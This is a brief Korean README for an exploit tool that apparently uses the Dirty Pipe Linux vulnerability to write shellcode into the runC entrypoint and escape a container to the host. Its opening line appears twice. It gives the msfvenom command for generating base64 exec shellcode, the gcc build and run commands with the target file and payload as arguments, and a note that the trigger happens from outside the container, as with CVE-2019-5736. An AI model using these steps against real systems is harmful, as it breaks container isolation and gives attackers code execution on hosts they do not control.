
dirtypipe를 사용하여 runC entrypoint에 shellcode를 주입하여 컨테이너 탈출을 구현하는 간단한 exploit입니다.
더티파이프(Dirty Pipe)를 사용하여 runC 진입점에 셸코드를 주입하여 컨테이너 이스케이프를 구현하는 간단한 익스플로잇입니다.
msf를 사용하여 base64로 인코딩된 셸코드를 생성합니다:
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64
컨테이너 내에서 컴파일 및 실행합니다. 덮어쓸 파일명은 runC가 컨테이너에서 실행할 바이너리입니다 (예: /bin/sh):
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>
CVE-2019-5736과 같이 컨테이너 외부에서 익스플로잇과 셸코드를 트리거합니다.